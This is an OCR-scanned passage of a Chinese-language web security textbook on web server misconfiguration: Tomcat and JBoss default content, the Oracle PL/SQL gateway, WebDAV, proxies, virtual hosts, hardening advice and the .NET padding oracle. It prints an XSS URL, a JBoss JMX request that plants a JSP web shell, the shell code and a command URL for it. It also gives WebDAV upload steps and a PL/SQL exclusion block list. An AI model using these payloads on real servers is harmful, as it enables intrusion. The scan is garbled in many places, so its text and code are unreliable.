攻击 者 只 需 在 URL 中 包含 脚本 标签 ， 如 /test/jsp/dump.jsp? 
%3Cscript%3Ealert(%22xss%22)%3C/script%3E， 即 可 实施 跨 站 点 脚本 
攻击 。 

Apache Tomcat 中 的 Sessions Example 脚 本 是 第 二 个 问题 的 典型 示 
例 。 如 图 18-2 所 示 ， 这 个 脚本 可 用 于 获取 并 设置 任意 会 话 变量 。 如 果 


TEMA at 


DTT ARE UR EA Pee, Boe at 


可 以 查看 这 些 数据 ， 将 通过 修改 它 的 值 来 破坏 应 用 程序 的 处 理 过 程 。 


i 


>) d 


© hter//wahh-app/serviets- cxarnples/serviet/SessionExample pP- 29X 


Sessions Example D 2 
Session ID: 062CB 1131 F90P5164 1 BDBBIDOSOEF 1B45 

Created Thu Jul 14 16:15:46 GMT 2011 

Last Accessed Thu Jul 14 16:15:46 GMT 2011 


The folowing data is in your session: 
Name of Session Attribute 

Value of Session Attribute: 

| Subm Query | 

GET based form 

Name of Session Attribute: 

Value of Session Attribute: 


Submd Query 


URL en 


oded 


图 18-2 Apache Tomcat 中 的 默认 SessionsExample 脚 本 


3. 强大 的 功能 

许多 Web 服 务 器 软件 包含 一 些 公众 无 法 访问 的 强大 功能 ， 但 终端 
用 户 通过 某 种 方式 可 以 访问 这 些 功 能 。 许 多 时 候 ， 只 要 提供 正确 的 管 
理 证 书 ， 应 用 程序 服务 器 都 允许 通过 应 用 程序 本 身 使 用 的 同一 HITP 端 
口 来 部 署 Web 档 案 (WAR 文件) 。 应 用 程序 的 这 种 部 署 过 程 是 黑客 的 
主要 攻击 目标 。 和 常见 的 渗透 测试 框架 能 够 自动 完成 以 下 过 程 : 扫描 默 
认证 书 、 上 传 包 含 后 门 的 Web 档 案 ， 然 后 执行 该 档案 以 获取 远程 系统 
上 的 命令 外 壳 ， 如 图 18-3 所 示 。 


eal Metasploit r= =) 


File Edit View Help 


图 18-3 ”使 用 Metasploit 攻 破 重要 的 Tomcat 服 务 器 


4. JMX 

JBoss 默 认 安 闭 的 JMX 控 制 台 是 一 种 典型 的 强大 默认 内 容 。JMX 控 
制 台 被 描述 为 “JBoss 应 用 程序 服务 器 微 内 核 的 原始 视图 ”。 实 际 上 ， 通 
过 它 可 以 直接 访问 JBoss 应 用 程序 服务 器 中 的 任何 托管 Beaan。 由 于 可 用 
功能 的 数量 众多 ， 因 此 ， 人 们 从 中 发 现 了 大 量 安全 漏洞 。 其 中 ， 最 简 
单 的 利用 方法 ， 是 使 用 DeploymentFileRepository 中 的 store 方 法 创建 包 
伟 后 门 的 WAR 文 件 ， 如 图 18-4 所 示 。 


T Wess IMA Mornsgemen Console = WEM- [+ 


名 > 1080 jpra-con sole Hiatt dapto ection inagecth Sean Sin ane joccc dm nN se ice NOD eploymentfilehescstor > 国 KE ? t D: 


( 
| 
3 


mpe 


i 
| 


图 18-4 JMX 控 制 台 包含 可 用 于 部 署 任 意 WAR 文 件 的 功能 


例如 ， 以 下 URL 将 上 传 一 个 包含 后 门 的 cmdshell.jsp 页 面 : 


http: //wahh-app. com: 8080/jmx-console/HtmlAdaptor?action=invokeOpByNamea&name- 
jboss. admint3Aservicet3CDeploymentFileRepository&methodName= 
storeéargType=java. lang.Stringé&arg0=cmdshell .warkargType= 

java. lang. String&argi-cmdshell&argType-java.lang.String&arg2= 
.jspkarglype=java.lang.String&arg3=$3CtZ25Runt ime. getRuntime$28%29.exec 
S$28recuest .cetParametert2satZ22cSZ2S 29S 29S IBS 2543 E¢0AkargTyves= 
boolean&arg4=True 


如 图 18-5 所 示 ， 该 URL 将 成 功 创建 可 执行 以 下 代码 的 服务 器 端 后 门 


<%Runtime.getRuntime({}).exec{request.getParameter("c"});%> 


图 18-5 ”使 用 JMX 控 制 台 在 JBoss 服务 器 上 部 署 后 门 WAR 文 件 的 成 功 攻 击 


<$Runtime.cetRuntime().exec(request.getParameter ("c"});%> 


然后 ， ARIRAMA 目 动 将 木马 WAR 文 件 部 署 到 JBoss 应 
ae 服务 器 中 。 部 署 该 文件 后 ， 即 可 以 在 新 建 的 cmdshell 应 用 程序 
中 访问 这 个 文件 ， 在 本 示例 中 ， 其 中 仅 包含 cmdshell.jsp: 


http: //wahh-app. com: 8080/cmdshell/cmdshell . jsp?c=cmd%20 / 
c$20ipconftigs3Ec: \foo 


T 注解 要 解决 上 述 问题 需要 将 GET 和 POST 方 法 仅 限于 管 
理 员 使 用 。 但 是 ， 只 需 使 用 HEAD 方 法 提出 上 述 请 求 ， 即 可 轻松 突 


破 这 种 限制 (有关 详细 信息 ， 请 访问 
www.securityfocus.com/bid/39710/) 。 和 任何 基于 配置 的 漏洞 一 样 ， 
Metasploit 等 工具 能 够 相当 高 效 地 利用 各 种 此 类 JMX 漏 洞 。 


5. Oracle 应 用 程序 

强大 的 默认 功能 的 最 典型 示例 ， 要 属 Oracle 应 用 程序 服务 器 实施 
的 PL/SQL 网 关 ; 其 他 Oracle 产 品 ， 如 电子 商务 套件 (E-Business 
Suite) 也 采用 了 这 个 网 关 。 这 项 功能 提供 一 个 接口 ， 通 过 它 可 向 一 个 
后 端 Oracle 数 据 库 提 出 Web 请 求 。 攻 击 者 可 以 使 用 类 似 于 下 面 的 URL 向 
数据 库 过 程 提交 任意 参数 : 


https: //wahh-app.com/pls/dad/package.procedure?paraml=foco&param2=bar 
这 项 功能 本 用 于 将 某 个 数据 库 执行 的 业务 逻辑 转换 成 用 户 友 好 的 
Web 应 用 程序 。 但 是 ， 由 于 攻击 者 能 够 指定 任意 过 程 ， 因 此 ， 他 可 以 
利用 PL/SQL 网 关 访 问 数据 库 中 的 强大 功能 。 例 如 ， 
SYS.OWA_UTIL.CELLSPRINT 过 程 可 用 于 执行 任意 数据 库 查询 ， 从 而 
获取 敏感 数据 : 


M+user 


为 防止 这 种 攻击 ，Oracle 引 入 一 个 名 为 PL/SQL 排 除 列 表 
(Exclusion List) 的 过 滤器 。 该 过 滤器 检查 被 访问 的 包 的 名 称 ， 并 阻 
止 攻击 者 访问 任何 以 下 面 的 表达 式 开 头 的 包 : 
SYS. 
DBMS _ 
UTL 
OWA_ 
OWA. 
HTP., 


HPP., 


该 过 滤器 旨 在 阻止 攻击 者 访问 数据 库 中 功能 强大 的 默认 功能 。 但 
是 ， 上 面 的 列表 并 不 全 面 ， 无 法 阻止 攻击 者 访问 数据 库 管理 员 拥 有 的 
其 他 功能 强大 的 默认 过 程 ， 如 CTXSYS 与 MDSYS。 此 外 ， 本 章 后 面 还 
会 介绍 与 PL/SQL 排 除 列表 有 关 的 一 些 问题 。 

当然 ，PL/SQL 了 网 关 最 初 主要 用 于 传送 数据 包 和 过 程 ， 但 此 后 发 现 
它 的 许多 默认 功能 都 包含 漏洞 。2009 年 ， 电 子 商务 套件 的 默认 数据 包 
组 成 部 分 被 证 实 包含 看 干 漏洞 ， 包 括 可 被 攻击 者 用 于 编辑 任意 页 面 。 
人 研究 人 员 提 供 了 使 用 icx_define_pages.DispPageDialog 在 管理 员 的 登录 
页 面 中 注入 HTML， 以 实施 保存 型 跨 站 点 脚本 攻击 的 示例 : 


{/Gad/icx_define_pages.DispPageDialog?p_mode=RENAMEé&amp; p_pvage_id=[page_id] 


渗透 测试 步骤 


(1) Nikto 之 类 的 工具 可 有 效 确 定 大 多 数 默认 的 Web 内 容 。 第 4 


章 摘 述 的 应 用 程序 解析 过 程 应 已 确定 所 针对 的 服务 占 中 的 绝 大 多 数 
默认 内 容 。 

(2) 使 用 搜索 引擎 和 其 他 资源 确定 与 已 知 应 用 程序 使 用 的 技 
术 有 关 的 默认 内 容 与 功能 。 如 果 可 能 ， 可 在 本 地 计算 机 上 安装 这 些 
技术 ， 从 中 查找 任何 可 在 渗透 测试 中 利用 的 上 默认 功能 。 


18.1.3 ”目录 列表 


当 Web 应 用 程序 收 到 一 个 访问 目录 而 非 真 实 文件 的 请 求 时 ， 它 会 
以 下 面 这 3 种 方式 进行 响应 。 

口 它 返回 目录 中 的 一 个 默认 资源 ， 如 index.html 。 

口 它 返回 一 个 错误 ， 如 HTTP 状 态 码 403， 表 示 请 求 被 禁 

口 它 返回 一 个 列表 ， 显 示 目 录 的 内 容 ， 如 图 18-6 所 示 。 


6 © mtp//wahh-ive/wihh-apmimages P- ax 


Index of /pub/images 


Name Last modified Size Description 


15-Jun-2010 0051 29K 
15-Jun-2010 00-39 36K 
15-Jun-2010 0104 28K 
25-Jan-2011 2042 418 
12-Jul-2011 1522 12M 
15-Jun-2011 0853 1.7M 
12-Jul-2011 06:52 467K 
12-Jul-2011 13-40 66K 
2879651221371241i pdf 03-Jul-2011 05-19 1.0M 
-0162412421354812121 pdf 16-Jun-2011 07-10 1.0M 
298 2011 02.47 930K 
139846411102895312 pdf 23-Jun-2011 09-18 23M 
10294624342144187601 pdf 16-Jun-2011 0649 11M 
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图 18-6 ”目录 列表 


许多 时 候 ， 目 录 列 表 (directory listing) 并 不 会 造成 安全 威胁 。 例 
如 ， 泄 露 一 个 图 像 目 录 的 索引 根本 不 会 引起 任何 不 良 后 果 。 确 实 ， 人 
们 常常 有 意 泄 露 目 录 列 表 ， 因 为 它们 有 助 于 在 包含 静态 内 容 的 站 点 间 
导航 ， 如 前 例 所 示 。 但 是 ， 基 于 以 下 两 个 主要 原因 ， 获 得 目录 列表 有 
利于 攻击 者 对 应 用 程序 实施 攻击 。 

口 许多 应 用 程序 并 不 对 它们 的 功能 与 资源 实施 正确 的 访问 控制 ， 
o aaa 问 敏 感 内 容 的 URL (请 参阅 第 8 章 了 解 相 

X) o 

口 日 志 、 备 份 文件 、 旧 版 脚本 等 文件 与 目 孙 经 常 被 无 意 遗 漏 在 服 
务 器 的 Web 根 目录 中 。 

在 上 述 两 种 情况 下 ， 真 正 的 漏洞 位 于 其 他 地 方 ， 其 原因 在 于 没有 
对 敏感 数据 实施 正确 的 访问 控制 。 但 是 ， 由 于 这 些 漏洞 极其 普遍 ， 不 
安全 的 资源 的 名 称 可 能 很 难 猜 测 ， 因 此 ， 这 时 获得 目录 列表 对 攻击 者 
而 言 非常 重要 ， 往 往 可 以 让 他 们 迅速 攻破 整个 应 用 程序 。 


渗透 测试 步骤 


向 在 应 用 程序 解析 过 程 中 发 现 的 Web 服 务 器 上 的 每 一 个 目录 提 
出 一 个 请 求 ， 确 定 任何 返回 目录 列表 的 场合 。 


T 注解 除 上 述 可 直接 获得 目录 列表 的 情况 外 ， 攻 击 者 还 可 


以 利用 大 量 已 经 在 Web 服 务 器 中 发 现 的 漏洞 获取 目录 列表 。 本 章 后 
面 将 讨论 其 中 一 些 漏洞 。 


18.1.4 WebDAV Ù 


WebDAV 指 用 于 Web 分 布 式 创作 与 版 本 控制 的 HTTP 方 法 集合 。 
1996 年 以 来 ， 这 些 方法 得 到 了 广泛 应 用 。 最 近 的 云 存 储 和 协作 应 用 程 
序 也 采用 了 WebDAV 方 法 ， 因 为 这 些 应 用 程序 需要 使 用 现 有 的 防火 墙 
友好 的 协议 (HTTP) 跨 系 统 访问 用 户 数据 。 如 第 3 章 所 述 ，HTTP 请 
求 能 够 使 用 除 标准 GET 和 POST 以 外 的 各 种 方法 。WebDAV 添 加 了 大 量 
其 他 可 用 于 操纵 Web 服 务 器 上 的 文件 的 方法 。 鉴 于 其 提供 的 功能 的 特 
点 ， 如 果 这 些 方法 可 以 由 低 权 限 用 户 访问 ， 这 些 用 户 就 可 以 利用 它们 
对 应 用 程序 实施 有 效 攻 击 。 以 下 是 一 些 值 得 注意 的 方法 : 

口 PUT， 问 指定 位 置 上 传 附 加 文件 ; 

口 DELETE， 删 除 指定 的 资源 ; 

口 COPY， 将 指定 的 资源 复制 到 Destination 消 息 头 指定 的 位 置 ; 

口 MOVE， 将 指定 的 资源 移动 到 Destination 消 息 头 指定 的 位 置 ; 
口 SEARCH， 在 目录 路 径 中 搜索 资源 ; 

PROPFIND， 获 取 与 指定 资源 有 关 的 信息 ， 如 作者 、 大 小 与 内 
容 类 型 。 

可 以 使 用 OPTIONS 方 法 列 出 某 个 特定 目录 人 允许 的 HTTP 方 法 。 例 如 : 


Content-Length: 0 
Accept-Ranges: none 
L: <DAV:5ql> 


Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIN 


D, PROPPATCH, LOCK, UNLOCK, SEARCH 
Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK 
Cache-Control: private 


这 个 啊 应 指出 ， 上 面 列 出 的 几 个 强大 的 方法 可 以 在 目录 中 使 用 。 
ue 实际 上 ， 使 用 这 些 方法 需要 通过 身份 验证 ， 或 取决 于 其 他 限 
J] o 
其 中 ，PUT 方 法 特别 危险 。 如 采 能 够 上 传 Web 根 目录 中 的 任意 文 
件 ， 束 可 以 在 服务 器 上 创建 将 由 服务 右 问 模块 执行 的 后 门 脚本 ， 从 而 
完全 控制 应 用 程序 ， 甚 至 是 Web 服 务 器 本 映 。 如 末 PUT 方 法 存在 且 被 
激活 ， 束 可 以 通过 以 下 方式 证 实 这 一 抬 : 


PUT /public/test.txt HTTP/1.1 
Host: mdsec.net 
Content-Length: 4 


test 


HTTP/1.1 201 Created 


注意 ， 应 用 程序 可 能 会 针对 每 个 目录 实施 不 同 的 权限 ， 因 此 ， 在 
测试 过 程 中 需要 进行 递归 检查 。 这 时 ， 可 以 使 用 DAVTest (将 在 下 一 
PHA) 之 类 的 工具 在 服务 器 的 所 有 目录 中 检查 PUT 方法 ， 并 确定 这 
些 目录 允许 使 用 哪些 文件 扩展 名 。 为 区 服 使 用 PUT 上 传 后 门 脚本 的 限 
制 ， 该 工具 还 会 在 MOVE 方 法 后 使 用 PUT 方法 ， 例 如 : 


C:\>perl davtest.pl -url http://mdsec.net/public -directory 1 -move -quiet 


MOVE asp FAIL 
MOVE „shtml FAIL 
MOVE -asox PAIL 


davtest.pl Summary: 

Created: http: //mdsec.net/public/i 

MOVE/PUT File: http: //mdsec.net/public/i/davtest_Umtl1hT8izy2.php 
MOVE/PUT File: http://mdsec.net/public/1/davtest_umtl1lhi8izy2.html 
MOVE/PUT File: http://mdsec.net/public/l/davtest_Umtllhis8izy2.c¢i 
MOVE/PUT File: http://mdsec.net/public/i/davtest_Umtl1LhI8izy2.cfim 
MOVE/PUT File: http://mdsec.net/public/1/davtest_UmtllhI8izy2.jep 
MOVE/PUT File: http://mdsec.net/public/1/davtest_Umtl1hISizy2.pl 
MOVE/PUT File: http://mdsec.net/public/l/davtest_Umtllhi8izy2. txt 
MOVE/PUT File: http://mdsec.net/public/1/davtest_UmtllhIi8izy2,. jntml 
Executes: http://mésec.net/public/i/davtest_UmtlihIsizy2.html 
Executes: http://mésec.net/public/i/davtest_UmtllhTBizy2.txt 


尝试 访问 


http://mdsec.net/public/ 


YY 提示 人 允许 终端 用 户 上 传 文件 的 webDAV 实 例 通 常 禁止 上 传 
特定 于 服务 器 环境 的 服务 器 端 脚本 语言 扩展 。 更 常见 的 情况 是 ， 用 
户 可 以 上 传 HTML 或 JAR 文 件 ， 攻 击 者 可 以 利用 这 两 种 文件 实施 针 
对 其 他 用 户 的 攻击 (请 参阅 第 12 章 和 第 13 章 了 解 相关 信息 ) 。 


渗透 测试 步骤 


要 测试 服务 器 如 何 处 理 不 同 的 HTTP 方法 ， 需 要 使 用 某 种 工 

具 ， 如 Burp Repeater， 渗 透 测 试 员 可 以 使 用 该 工具 发 送 任意 请 求 ， 
并 完全 控制 消息 头 和 消息 主体 。 

(1) 使 用 OPTIONS 方 法 列 出 服务 器 使 用 的 HTTP 方 法 。 注 意 ， 
不 同 目录 中 激活 的 方法 可 能 各 不 相同 。 

(2) 许多 时 候 ， 一 些 方法 被 告知 有 效 ， 但 实际 上 它们 并 不 能 
使 用 。 有 了 时， 即使 OPTIONS 请 求 返 回 的 响应 中 没有 列 出 某 个 方法 ， 
但 该 方法 仍然 可 用 。 因 此 ， 应 手动 测试 每 一 个 方法 ， 确 认 其 是 否 可 
用 o 


(3) 如 果 发 现 一 些 WebDAV 方 法 被 激活 ， 应 使 用 激活 WebDAV 
的 客户 端 进行 深入 调查 ， 如 Microsoft FrontPage 或 Internet Explorer 中 
的 “以 Web 文 件 夹 方 式 打 开 ”(Open as Web Folder) 选项 。 
(a) 尝试 使 用 PUT 方 法 上 传 一 个 民 性 文件 ， 如 文本 文件 。 
b) 如 果 上 传 成 功 ， 党 试 使 用 PUT 上 传 一 个 后 门 脚本 。 
(c) 如 果 运 行 脚本 所 需 的 扩展 名 受到 阻止 ， 党 试 以 .txt 扩 展 名 
传 该 文件 ， 并 使 用 MOVE 方 法 将 其 移动 到 采用 痢 扩 展 名 的 文件 


d 如 果 以 上 方法 均 无 效 ， 尝 试 上 传 一 个 JAR 文 件 ， 或 一 个 浏 
将 其 内 容 显 示 为 HTML 的 文件 。 
(e) 使 用 davtest.pl] 之 类 的 工具 遍历 所 有 目录 。 


18.1.5 Web 服务 器 作为 代理 服务 器 


Web 服 务 器 有 了 时 被 配置 为 转发 或 反 向 HTTP 代 理 服 务 器 (请 参阅 第 
3 章 了 解 相 关内 容 ) 。 如 果 一 台 服 务 器 被 配置 为 转发 代理 服务 器 ， 那 么 
根据 它 的 配置 ， 可 以 利用 该 服务 器 执行 以 下 各 种 攻击 。 

口 攻击 者 可 以 使 用 该 服务 器 攻击 因特网 上 的 第 三 方 系统 ， 对 攻击 
目标 而 言 ， 恶 意 流量 似乎 是 来 目 易 受 攻击 的 代理 服务 套 。 

口 攻击 者 可 以 使 用 代理 服务 器 连接 组 织 内 部 网 络 中 的 任意 主机 ， 
攻击 从 因特网 无 法 直接 访问 的 目标 。 


口 攻 击 者 可 以 使 用 代理 服务 絮 反 问 连 接 代 理 服 务 器 主机 上 运行 的 
其 他 服务 ， 突 破 防 火 墙 限制 ， 并 利用 信任 关系 避 开 号 份 验 证 。 

可 以 使 用 两 种 主要 的 技巧 让 转发 代理 服务 屁 进 行 正 问 连 接 
(onward connection) 。 第 一 种 方法 是 ， 发 送 一 个 包含 完整 URL 的 
Pe E nde ae Png ag 
M: 


://wahh-otherapp.com:80/ HTTP/1.0 


TTP/1.1 200 OK 


如 果 配 置 服务 器 将 请 求 转发 到 指定 的 主机 ， 那 么 它 将 返回 那 台 主 
机 的 内 容 。 但 是 ， 一 定 记 得 核实 返回 的 内 容 不 是 来 自 最 初 的 服务 器 。 
大 多 数 Web 服 务 器 接受 包含 完整 URL 的 请 求 ， 许 多 服务 器 则 完全 忽略 
和 中 指定 的 主机 ， 从 它们 自己 的 Web 根 目录 中 返回 被 请 求 的 资 
源 。 

第 二 种 利用 代理 服务 器 的 方法 是 使 用 CONNECT 方 法 指定 到 目标 
主机 与 端口 号 。 例 如 : 


CONNECT wahh-otherapp.com:443 HTTP/1.0 


HTTP/1.0 200 Connection established 


如 果 服 务 器 以 这 种 方式 做 出 响应 ， 就 表示 它 正 在 代理 该 连接 。 通 
常 ， 第 二 种 技巧 的 功能 更 强大 ， 因 为 现在 代理 服务 器 将 转发 传送 到 指 
定 主 机 以 及 由 该 主机 送出 的 所 有 流量 ， 人 允许 穿 透 连接 中 的 其 他 协议 ， 
攻击 非 HITP 服 务 。 然 而 ， 大 多 数 代 理 服 务 器 对 通过 CONNECT 方 法 可 
到 达 的 端口 实施 严格 的 限制 ， 通 常 只 允许 连接 端口 443。 

利用 这 种 攻击 的 技巧 已 经 在 10.4.1 节 详细 介绍 过 了 。 


渗透 测试 步骤 


(1) 使 用 GET 与 CONNECT 请 求 ， 党 试用 Web 服 务 器 作为 代理 


服务 妖 ， 连 接 因特网 上 的 其 他 服务 器 ， 并 获取 其 中 的 内 容 。 

(2) 尝试 使 用 前 面 描 述 的 两 种 技巧 连接 主机 基础 架构 中 的 不 
同 耳 地址 与 端口 。 

(3) 莹 试 使 用 前 面 描述 的 两 种 技巧 ， 在 请 求 中 指定 127.0.0.1 为 
目标 主机 ， 连 接 Web 服 务 右 上 的 利用 端口 号 。 


18.1.6 ”虚拟 主机 配置 缺陷 


第 17 章 介绍 了 如 何 使 用 HTTP Host 消 息 头 指定 返回 内 容 的 Web 站 
点 ， 配 置 Web 服 务 絮 为 几 个 Web 站 点 的 主机 。 在 Apache 中 ， 虚 拟 主 机 
通过 以 下 方式 配置 : 

<VirtualHost *> 
ServerName eis 
DocumentRoot /var/www2 

</VirtualHost> 


除 DocumentRoot 指 令 外 ， 还 可 以 使 用 虚拟 主机 容器 为 Web 站 点 指 
定 其 他 配置 选项 。 这 时 ， 我 们 常 犯 的 一 个 错误 是 忽略 默认 主机 ， 导 人 致 
任何 安全 配置 仅 适 用 于 一 台 虚 拟 主机 ， 而 在 访问 默认 主机 时 却 可 轻易 
避 开 。 


渗透 测试 步骤 


(1) 使 用 以 下 方式 同根 目录 提交 GET 请 求 : 
口 正确 的 Host 消 息 头 ; 
J ba Hostile Bk: 


口 Host 消 息 头 中 的 服务 絮 IP 地 址 ; 
o Host) E% e 
(2) 对 这 些 请 求 的 响应 进行 比较 。 常 见 的 结果 是 ， 在 Host 消 息 
头 中 使 用 一 个 下 地 址 可 获得 目录 列表 。 还 可 以 获得 各 种 默认 内 容 。 
(3) 如果 观 察 到 不 同 的 行为 ， 使 用 生成 不 同 结 果 的 Host 消 息 头 
重复 应 用 程序 解析 过 程 。 一 定 要 使 用 -vhost 选 项 进行 一 次 Nikto 扫 
描 ， 确 定 在 最 初 的 应 用 程序 解析 过 程 中 忽略 的 任何 默认 内 容 。 


18.1.7 Web 服 务 器 配置 的 安全 


从 本 质 上 讲 ， 保 障 Web 服 务 器 配置 的 安全 并 不 困难 ; 1H, FLA 
大 意 与 缺乏 安全 意识 是 造成 问题 的 主要 原因 。 最 重要 的 是 必须 充分 了 
解 所 使 用 的 软件 的 文档 资料 及 有 天 的 强化 指南 。 
束 需 要 解决 的 常见 配置 问题 而 言 ， 确 保 包 括 以 下 所 有 领域 。 

口 如 有 可 能 ， 修 改 所 有 默认 证 书 ， 包 括 用 户 名 和 密码 。 删 除 任何 
不 必要 的 账户 。 

口 在 Web 根 目录 的 相关 路 径 上 应 用 访问 控制 列表 (Access Control 
List, ACL) ， 或 者 对 非 标准 端口 设置 防火 墙 ， 阻 止 公众 访问 管理 接 


O o 

O TBR ATA XMAN BASE SES re BARU AAS RE A 
Web 目 孙 中 的 内 容 ， 确 定 任何 遗留 的 项 目 ， 使 用 Nikto 工 具 进 行 重复 检 
a [© 


E 


口 如 果 需 要 保留 任何 默认 功能 ， 尽 量 对 其 进行 强化 ， 禁 用 不 必要 
的 选项 与 行为 。 

口 在 所 有 Web 目 录 中 查找 目录 列表 。 如 有 可 能 ， 在 一 个 控制 整个 
服务 絮 的 配置 中 禁用 目录 列表 。 还 可 以 确保 每 个 目录 包含 服务 器 默认 
提供 的 index.html 文 件 。 


口 除 应 用 程序 常用 的 方法 外 (通常 为 GET 与 POST 方 法 ) ， 禁 用 其 
他 所 有 方法 。 

口 确保 没有 将 Web 服 务 器 配置 为 代理 服务 器 。 如 果 确 实 需要 这 项 
功能 ， 应 尽量 强化 其 配置 ， 只 人 允许 它 连接 可 合法 访问 的 特定 主机 与 端 
口 。 还 可 以 执行 网 络 层 过 滤 ， 以 此 作为 另 一 层 防御 ， 控 制 Web 服 务 器 
向 外 发 出 的 请 求 。 

口 如 果 Web 服 务 器 支持 虚拟 主机 ， 确 保 在 默认 主机 上 实施 服务 器 
ee ee E 
全 强化 。 


18.2 ` 


Webi k AA IFIEREE, OMMHA TESS ARE 
单 的 轻 量 级 软件 ， 以 及 能 够 处 理 各 种 任务 、 提 供 除 业务 逻辑 本 号 以 外 
的 所 有 功能 的 高 度 复杂 的 应 用 程序 平台 。 融 后 者 而 言 ， 人 们 大 多 认为 
这 类 框架 是 安全 的 。 以 前 ，Web 服 务 右 软件 被 一 系列 亚 重 的 安全 漏洞 
所 困扰 ， 使 得 攻击 者 能 够 执行 任意 代码 、 守 取 文 件 和 提升 权限 。 这 些 
年 来 ， 主 流 Web 服 务 器 平台 已 挛 得 日 渐 可 靠 。 许 多 情况 下 ， 核 心 功能 
仍 保持 静态 ， 甚 至 经 过 精简 ， 因 为 供应 商 有 意 减 少 上 默认 的 受 攻击 面 。 
但 是 ， 即 使 这 些 漏洞 越 来 越 少 ， 其 背后 的 原理 仍然 适用 。 在 本 书 第 1 版 
中 ， 我 们 提供 了 一 些 最 有 可 能 包含 漏洞 的 服务 器 软件 示例 。 目 第 1 版 出 
版 以 来 ， 人 们 在 各 类 软件 (通常 为 并 行 技术 或 服务 器 产品 ， 中 均 发 现 
了 新 的 漏洞 。 除 一 些小 型 个 人 Web 服 务 器 及 其 他 次 要 目标 外 ， 这 些 新 
漏洞 大 多 存在 于 以 下 软件 之 中 : 

口 IS 和 Apache 中 的 服务 器 端 扩 展 。 

口 NAA ACH BTA Webi an, IX RARBG ae EB AT SRE 
应 用 程序 ， 或 作为 开发 环境 的 一 部 分 提供 。 它 们 可 能 较 少 受到 现实 世 
界 中 的 黑客 的 关注， 因而 更 可 能 存在 上 述 问 题 。 


18.2.1 应 用 程序 框架 缺陷 


多 年 以 来 ，Web 应 用 程序 框架 一 直 存 在 各 种 严重 的 缺陷 。 我 们 将 
介绍 最 近 在 某 个 框架 中 发 现 的 一 个 常见 缺陷 ， 这 个 缺陷 导致 在 该 框架 
上 运行 的 许多 应 用 程序 都 易于 受到 攻击 。 

.NET 填 充 提示 

.NET 中 的 “填充 提示 ”(padding oracle) 漏洞 是 近年 来 最 为 著名 的 
漏洞 。.NET 对 CBC 分 组 密码 使 用 PKCS #5 填充 ， 其 操作 方式 如 下 。 

分 组 密码 基于 固定 的 分 组 大 小 进行 操作 ， 在 .NET 中 ， 这 样 的 分 组 
通常 为 8 或 16 字 节 。.NET 采 用 PKCS #5 标准 为 每 一 个 明文 字符 串 添加 填 
充 字 广 ， 以 确保 生成 的 明文 字符 串 长 度 可 以 被 分 组 大 小 整除 。 这 
时 ，.NET 不 是 使 用 任意 值 进 行 填充 ， 选 择 用 于 填充 的 值 是 填充 字 贡 的 
数量 。 每 个 字符 串 都 会 被 填充 ， 如 果 初 始 字符 串 是 分 组 大 小 的 倍数 ， 
将 填充 整个 分 组 。 因 此 ， 如 果 分 组 大 小 为 8， 则 必须 使 用 1 个 0x01 字 
节 、2 个 0x02 字 节 ， 或 最 多 8 个 0x08 字 节 的 任意 组 合 进 行 填 充 。 然 后 ， 


将 第 一 条 消息 的 明文 与 称 为 初始 化 向 量 (IV) 的 预 设 消 息 分 组 进行 
XOR 运 算 。 (回顾 我 们 在 第 7 章 讨 论 的 在 密 文 中 选择 模式 时 遇 到 的 问 
题 。) 如 第 7 章 所 述 ， 接 下 来 ， 第 二 条 消息 将 与 第 一 条 消息 的 密 文 进行 
XOR 运 算 ， 从 而 开始 循环 分 组 链 。 

整个 .NET 加 密 过 程 如 下 。 

(1) 选择 明文 消息 。 

(2) 使 用 所 需 的 填充 字符 数 作为 填充 字 节 值 填充 该 消息 。 
(3) 将 第 一 个 明文 分 组 与 初始 化 向 量 进行 XOR 运 算 。 

(4) 使 用 三 重 DES 加 密 从 第 3 步 的 XOR 运 算得 到 的 值 。 

从 这 时 开始 ， 将 循环 执行 以 下 步骤 ， 以 加 密 剩 余 的 消息 (这 就 是 
第 7 章 介 绍 的 密码 块 链 (CBC) 过 程 ) 

(5) 将 第 二 个 明文 分 组 与 加 密 后 的 前 一 个 分 组 进行 XOR 运 算 。 
(6) 使 用 三 重 DES 加 密 XOR 运 算得 到 的 值 。 

o 填充 提示 

在 2010 年 9 月 之 前 ， 易 受 攻击 的 .NET 版 本 包含 一 个 看 似 无 害 的 信 
息 洪 露 漏洞 。 如 果 在 消息 中 发 现 填 充 错误 ， 应 用 程序 会 报告 错误 ， 问 
用 户 返回 500 HTTP 啊 应 码 。 如 下 所 述 ， 组 合 利 用 PKCS#5 填 充 算 法 和 
CBC 的 上 述 行为 ， 攻 击 者 可 以 攻破 整个 .NET 安 全 机 制 。 

请 注意 ， 为 了 发 挥 效用 ， 所 有 了 明文 字符 串 应 包含 至 少 一 字 节 的 填 
充 信 息 。 此 外 还 要 注意 ， 看 到 的 第 一 个 密 文 分 组 为 初始 化 向 量 ; 该 向 
量 的 唯一 用 途 ， 是 与 消息 的 第 一 个 加 密 分 组 的 明文 值 进行 XOR 运 算 © 
为 实施 攻击 ， 攻 击 者 将 向 应 用 程序 提交 一 个 仅 包 含 前 两 个 密 文 分 组 的 
字符 串 。 这 两 个 分 组 分 别 为 IV 及 第 一 个 密 文 分 组 。 然 后 ， 攻 击 者 提交 
一 个 仅 包 含 数字 零 的 IV， 并 通过 逐步 递增 该 IV 的 最 后 一 个 字 节 ， 提 出 
一 系列 请 求 。 该 字 节 将 与 密 文 中 的 最 后 一 个 字 节 进行 XOR 运 算 ， 除 非 
针对 该 字 节 生成 的 值 为 0x01， 否 则 加 密 算 法 将 抛 出 错误 ! (前 面 我 们 
讲 过 ， 任 何 字符 串 的 明文 值 必 须 以 一 个 或 多 个 填充 值 结 尾 。 由 于 第 一 
个 密 文 分 组 中 不 存在 任何 其 他 填充 值 ， 因 此 最 后 一 个 值 必定 被 加 密 为 


Ox01° ) 
最 终 他 会 得 到 这 样 的 值 : 如 果 


攻击 者 可 以 利用 以 下 错误 条 件 
将 该 值 与 密 文 分 组 的 最 后 一 个 字 节 进行 XOR 运 算 ， 结 果 为 0x01。 这 
时 ， 将 可 以 确定 最 后 一 个 字 节 y 的 明文 值 ， 因 为 : 


x XOR y = 0x01 


因此 ， 我 们 也 由 此 确定 x 的 值 。 


以 上 过 程 同 样 适 用 于 密 文 中 的 倒数 第 二 个 字 节 。 这 次 ， 在 已 知 y 值 
